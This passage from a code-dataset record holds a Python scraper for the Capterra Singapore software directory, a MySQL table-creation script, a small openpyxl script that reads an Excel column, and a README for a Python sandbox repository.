'html.parser')\n movie_list = soup.find_all('a', class_='list-group-item')\n\n result_list = []\n for item in movie_list:\n software_type = {'title': item.text, 'url': item['href']}\n result_list.append(software_type)\n return result_list\n\n\ndef get_redirect_url(previous_url):\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}\n response = requests.get(previous_url, headers=headers)\n soup = BeautifulSoup(response.text, 'html.parser')\n redirect_url = soup.find('meta', attrs={'http-equiv': 'refresh'})\n actual_url = redirect_url['content'].partition('=')[2]\n try:\n response = requests.get(actual_url, headers=headers)\n except urllib3.exceptions.MaxRetryError as ex:\n print(\"the website is down.\")\n actual_url = str(ex).split('\\'')[1]\n print(actual_url)\n return actual_url\n except requests.exceptions.SSLError as ex:\n print(\"the website is not connected with SSL.\")\n actual_url = str(ex).split('\\'')[1]\n print(actual_url)\n return actual_url\n return response.url\n\n\ndef parse_software(software_type, html_text):\n soup = BeautifulSoup(html_text, 'html.parser')\n item_list = soup.find_all('div', class_='card product-card mb-3 border-primary pt-2')\n result_list = []\n for item in item_list:\n title = item.find(class_='evnt').string\n print(title)\n visit_url = item.find(class_='btn btn-preferred btn-sm text-truncate btn-block evnt')['href']\n website = get_redirect_url('https://www.capterra.com.sg'+visit_url)\n summary = item.find(class_='d-lg-none').get_text()\n software_type = {'type': software_type, 'title': title, 'summary': summary, 'website': website}\n result_list.append(software_type)\n return result_list\n\n\ndef get_page_number(html_text):\n soup = BeautifulSoup(html_text, 'html.parser')\n page_items = soup.find_all('li', class_='page-item')\n if bool(page_items):\n last_page = page_items[len(page_items) - 2].get_text()\n return int(last_page)\n return 1\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n\n with open('data.json', 'w', encoding='utf-8') as f:\n url = 'https://www.capterra.com.sg/directory'\n text = start_requests(url)\n directory = parse_directory(text)\n for current in directory:\n # print(current['url'])\n text = start_requests(current['url'])\n nPage = get_page_number(text)\n software_list = parse_software(current['title'], text)\n json.dump(software_list, f, ensure_ascii=False, indent=4)\n print(software_list)\n\n if 1 == nPage: continue\n\n for i in range(2, nPage + 1):\n new_url = current['url'] + '?page=' + str(i)\n print(new_url)\n text = start_requests(new_url)\n software_list = parse_software(current['title'], text)\n json.dump(software_list, f, ensure_ascii=False, indent=4)\n print(software_list)\n" }, { "alpha_fraction": 0.5633803009986877, "alphanum_fraction": 0.5744194984436035, "avg_line_length": 29.546510696411133, "blob_id": "a9f0ba7c5ae3fe1926b22e35344d95fad170997b", "content_id": "4f261e3be07e718761f86e608592c8dd72745660", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2627, "license_type": "no_license", "max_line_length": 83, "num_lines": 86, "path": "/create_database.py", "repo_name": "winnerineast/capterra", "src_encoding": "UTF-8", "text": "import mysql.connector\nfrom mysql.connector import errorcode\n\n\nconfig = dict(user='root',\n password='1',\n host='127.0.0.1',\n database='capterra',\n raise_on_warnings=True,\n use_pure=True)\n\nDB_NAME = 'capterra'\nTABLES = {'categories': (\n \"CREATE TABLE `categories` (\"\n \" `id` smallint NOT NULL AUTO_INCREMENT,\"\n \" `name` varchar(100) NOT NULL,\"\n \" `description` varchar(5000) NOT NULL,\"\n \" PRIMARY KEY (`id`)\"\n \") ENGINE=InnoDB\"),\n 'softwares': (\n \"CREATE TABLE `softwares` (\"\n \" `id` int NOT NULL AUTO_INCREMENT,\"\n \" `name` varchar(100) NOT NULL,\"\n \" `rating` tinyint NOT NULL,\"\n \" `summary` varchar(5000) NOT NULL,\"\n \" `features` json NOT NULL,\"\n \" `website` varchar(1000) NOT NULL,\"\n \" `about` json NOT NULL,\"\n \" `pricing` json NOT NULL,\"\n \" `deployment` json NOT NULL,\"\n \" `alternative` json NOT NULL,\"\n \" `reviews` json NOT NULL,\"\n \" PRIMARY KEY (`id`)\"\n \") ENGINE=InnoDB\"\n )\n}\n\n\ndef create_database(cur, data_name):\n try:\n cur.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8mb4'\".format(data_name))\n except mysql.connector.Error as ex:\n print(\"Failed creating database: {}\".format(ex))\n exit(1)\n\n\ntry:\n cnx = mysql.connector.connect(**config)\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(err)\nelse:\n cursor = cnx.cursor()\n try:\n cursor.execute(\"USE {}\".format(DB_NAME))\n print(\"Database {} exists and skip database creation.\".format(DB_NAME))\n except mysql.connector.Error as ex:\n print(\"Database {} does not exists.\".format(DB_NAME))\n if ex.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor, DB_NAME)\n print(\"Database {} created successfully.\".format(DB_NAME))\n cnx.database = DB_NAME\n else:\n print(ex)\n exit(1)\n\n for table_name in TABLES:\n table_description = TABLES[table_name]\n try:\n print(\"Creating table {}: \".format(table_name), end='')\n cursor.execute(table_description)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n cursor.close()\n cnx.close()\n" } ]
3
robertsmieja/python-sandbox
https://github.com/robertsmieja/python-sandbox
e702defd88ec9a5d8915fe80dbe8eabf71ac43de
672bf094adc0754ad139e57fc6eac0402b32afb2
82d7abeae12b0fca7d5a135734af15672ada892e
refs/heads/master
2020-06-02T05:28:43.447951
2019-06-09T20:49:15
2019-06-09T20:49:15
191,053,678
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6744186282157898, "alphanum_fraction": 0.6790697574615479, "avg_line_length": 14.357142448425293, "blob_id": "7f211d3d051b1fb67d0423b2f35d9a5c86fc0452", "content_id": "6009bd255ac72c4a2994a717edcca5c35dfc7fc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 215, "license_type": "no_license", "max_line_length": 40, "num_lines": 14, "path": "/read_excel.py", "repo_name": "robertsmieja/python-sandbox", "src_encoding": "UTF-8", "text": "import openpyxl\n\n# grab excel file\nwb = openpyxl.load_workbook('File.xlsx')\n\n# grab worksheet\nws = wb['Sheet1']\n\n# get all rows in 'C'\nrowsInC = ws['C']\n\n# print each cell\nfor cell in rowsInC:\n print(cell.value)\n" }, { "alpha_fraction": 0.5992217659950256, "alphanum_fraction": 0.6070038676261902, "avg_line_length": 22.363636016845703, "blob_id": "8bb645fb7a1f59abd1af744c9327ab544cc0b500", "content_id": "2e9e0da4d983034e7c52cf3d4ee730a5d7f4497e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 257, "license_type": "no_license", "max_line_length": 49, "num_lines": 11, "path": "/README.md", "repo_name": "robertsmieja/python-sandbox", "src_encoding": "UTF-8", "text": "Python Sandbox\n==============\n\n# Requirements\n* [Python 3.7](https://www.python.org/downloads/)\n* [PipEnv](https://github.com/pypa/pipenv) \n * ```sh\n pip install --user pipenv\n ```\n## Recommended\n* [PyCharm](https://www.jetbrains.com/pycharm/)\n" } ]
2